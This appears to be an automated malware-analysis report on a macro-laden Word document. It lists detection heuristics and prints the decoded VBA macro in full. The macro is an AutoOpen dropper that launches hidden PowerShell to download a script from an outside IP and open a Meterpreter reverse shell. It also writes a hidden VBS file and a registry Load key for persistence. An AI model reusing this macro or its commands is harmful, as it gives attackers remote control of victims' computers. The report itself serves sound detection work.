MALICIOUS
590
Risk Score
Heuristics 15
-
ClamAV: Win.Trojan.PowerShell-6312116-0 critical CLAMAV_DETECTIONClamAV detected this file as malware: Win.Trojan.PowerShell-6312116-0
-
VBA macros detected medium 8 related findings OLE_VBA_MACROSDocument contains VBA macro code
-
WScript.Shell usage critical OLE_VBA_WSCRIPTWScript.Shell usageMatched line in script
a.WriteLine ("Set objShell = WScript.CreateObject(""WScript.Shell"")") -
PowerShell reference in VBA critical OLE_VBA_PSPowerShell reference in VBAMatched line in script
objProcess.Create "powershell.exe -ExecutionPolicy Bypass -WindowStyle Hidden -noprofile -noexit -c IEX ((New-Object Net.WebClient).DownloadString('http://216.191.204.115/invokeShellCode.ps1')); Invoke-Shellcode -Payload windows/meterpreter/reverse_https -Lhost 216.191.204.115 -Lport 443 -Force", Null, objConfig, intProcessID -
VBA stages a PowerShell/LOLBin download-and-run command critical OLE_VBA_BITSTRANSFER_DROPPERThe macro assembles a download command using a PowerShell or LOLBin download primitive (Start-BitsTransfer, Invoke-WebRequest, Net.WebClient, bitsadmin, certutil, ...) that fetches a remote payload, then executes it -- writing it to a script file and running it, or launching it directly from an auto-exec handler. The keywords are commonly split with PowerShell backtick / cmd caret escapes to evade scanners; this detection de-escapes the source first. A high-confidence downloader/dropper, stronger than the individual Shell / download keywords on their own.Matched line in script
Sub AutoOpen() -
VBA WMI Win32_Process launcher critical OLE_VBA_WMI_PROCESS_CREATEVBA macro builds or references a WMI moniker for Win32_Process and invokes .Create to start a command. This is a high-confidence macro execution chain that often hides the WMI class name through string concatenation or helper functions.Matched line in script
Set objWMIService = GetObject("winmgmts:\\" & strComputer & "\root\cimv2") -
CreateObject call high OLE_VBA_CREATEOBJCreateObject callMatched line in script
Set fs = CreateObject("Scripting.FileSystemObject") -
GetObject call high OLE_VBA_GETOBJGetObject callMatched line in script
Set objWMIService = GetObject("winmgmts:\\" & strComputer & "\root\cimv2") -
VBA p-code auto-exec with execution tokens high OLE_VBA_PCODE_AUTOEXEC_EXECTriggers on the COMBINATION of two tokens co-occurring in the same compiled VBA/cache stream: an auto-execution entry point (Auto_Open / AutoOpen / Document_Open / Workbook_Open / Auto_Close / AutoClose) AND a shell/download/object-execution token (Shell, CreateObject, GetObject, PowerShell, cmd.exe, URLDownloadToFile, WinHttp, XMLHTTP, ADODB.Stream, ShellExecute, ExecuteExcel4Macro). Neither token alone fires it — it is the pairing that flags p-code-only or source-extraction-failure macro documents where the visible VBA source is unavailable. The matched tokens are named in the detail line below.
-
AutoOpen macro low OLE_VBA_AUTOOPENAutoOpen macroMatched line in script
Sub AutoOpen() -
Reference to PowerShell high SC_STR_POWERSHELLReference to PowerShell
-
Reference to Windows Script Host high SC_STR_WSCRIPTReference to Windows Script Host
-
LOLBin token sequence in document text high SE_LOLBIN_RUN_COMMANDExtracted document text contains a Windows script/execution tool name (PowerShell, mshta, cmd, rundll32, regsvr32, …) within 220 characters of a dangerous flag, command verb, or URL. This is a visible 'run this' instruction in HTML/PDF/RTF lure bodies, or — in macro-laden Office files — the macro's own string-pool entries appearing adjacent in extracted text.
-
Legacy WordBasic auto-exec macro marker medium OLE_LEGACY_WORDBASIC_AUTOEXECOLE Word document contains a legacy WordBasic auto-execution marker such as AutoOpen, but no modern VBA project was recovered and no stronger macro-virus family marker was present. This is analyst-facing evidence for old Word macro execution surface, not a downloader or parser-CVE attribution by itself.
-
Embedded URL info EMBEDDED_URLOne or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.URL http://216.191.204.115/invokeShellCode.ps1 In document text (OLE body)
- http://216.191.204.115/invokeSIn document text (OLE body)
- http://schemas.openxmlformats.org/drawingml/2006/mainIn document text (OLE body)
- http://schemas.openxmlformats.org/officeDocument/2006/bibliographyIn document text (OLE body)
- http://schemas.openxmlformats.org/officeDocument/2006/customXmlIn document text (OLE body)
Extracted artifacts 1
Files carved from inside the sample during analysis.
| Filename | Kind | Source | Size |
|---|---|---|---|
macros.bas |
vba-macro | oletools.olevba.extract_macros (decoded VBA source) | 3290 bytes |
SHA-256: 11d9b8faed614c56a14078f4bae93c45cbf66d228744142cdd64b4cb8af4fac4 |
|||
Preview scriptFirst 1,000 lines of the extracted script
Attribute VB_Name = "ThisDocument"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
Sub AutoOpen()
Dim DateStart, DateEnd
DateStart = DateSerial(2015, 8, 11)
DateEnd = DateSerial(2015, 9, 4)
If DateDiff("D", DateStart, Now) >= 0 And DateDiff("D", Now, DateEnd) >= 0 Then
Execute
Persist
Reg
Start
End If
End Sub
Public Function Execute() As Variant
Const HIDDEN_WINDOW = 0
strComputer = "."
Set objWMIService = GetObject("winmgmts:\\" & strComputer & "\root\cimv2")
Set objStartup = objWMIService.Get("Win32_ProcessStartup")
Set objConfig = objStartup.SpawnInstance_
objConfig.ShowWindow = HIDDEN_WINDOW
Set objProcess = GetObject("winmgmts:\\" & strComputer & "\root\cimv2:Win32_Process")
objProcess.Create "powershell.exe -ExecutionPolicy Bypass -WindowStyle Hidden -noprofile -noexit -c IEX ((New-Object Net.WebClient).DownloadString('http://216.191.204.115/invokeShellCode.ps1')); Invoke-Shellcode -Payload windows/meterpreter/reverse_https -Lhost 216.191.204.115 -Lport 443 -Force", Null, objConfig, intProcessID
End Function
Public Function Persist() As Variant
On Error Resume Next
SetAttr "C:\Users\Public\config.vbs", vbNormal
KillFile = "C:\Users\Public\config.vbs"
'Check that file exists
If Len(Dir$(KillFile)) > 0 Then
'First remove readonly attribute, if set
SetAttr KillFile, vbNormal
'Then delete the file
Kill KillFile
End If
Set fs = CreateObject("Scripting.FileSystemObject")
Set a = fs.CreateTextFile("C:\Users\Public\config.txt", True)
a.WriteLine ("Dim objShell, DateStart, DateEnd")
a.WriteLine ("DateStart = DateSerial(2015, 8, 11)")
a.WriteLine ("DateEnd = DateSerial(2015, 9, 4)")
a.WriteLine ("If DateDiff(""D"", DateStart, Now) >= 0 And DateDiff(""D"", Now, DateEnd) >= 0 Then")
a.WriteLine ("Set objShell = WScript.CreateObject(""WScript.Shell"")")
a.WriteLine ("command = ""C:\WINDOWS\system32\WindowsPowerShell\v1.0\powershell.exe -ep Bypass -WindowStyle Hidden -nop -noexit -c IEX ((New-Object Net.WebClient).DownloadString('http://216.191.204.115/invokeShellCode.ps1')); Invoke-Shellcode -Payload windows/meterpreter/reverse_https -Lhost 216.191.204.115 -Lport 443 -Force""")
a.WriteLine ("objShell.Run command,0")
a.WriteLine ("Set objShell = Nothing")
a.WriteLine ("End If")
a.Close
GivenLocation = "C:\Users\Public\"
OldFileName = "config.txt"
NewFileName = "config.vbs"
Name GivenLocation & OldFileName As GivenLocation & NewFileName
SetAttr "C:\Users\Public\config.vbs", vbHidden
End Function
Public Function Reg() As Variant
Set WshShell = CreateObject("WScript.Shell")
WshShell.RegWrite "HKCU\Software\Microsoft\Windows NT\CurrentVersion\Windows\Load", "C:\Users\Public\config.vbs", "REG_SZ"
Set WshShell = Nothing
End Function
Public Function Start() As Variant
Const HIDDEN_WINDOW = 0
strComputer = "."
'Shell "wscript C:\Users\Public\config.vbs", vbNormalFocus
End Function
|
|||
Open this report in the interactive analyzer, or submit your own file for analysis.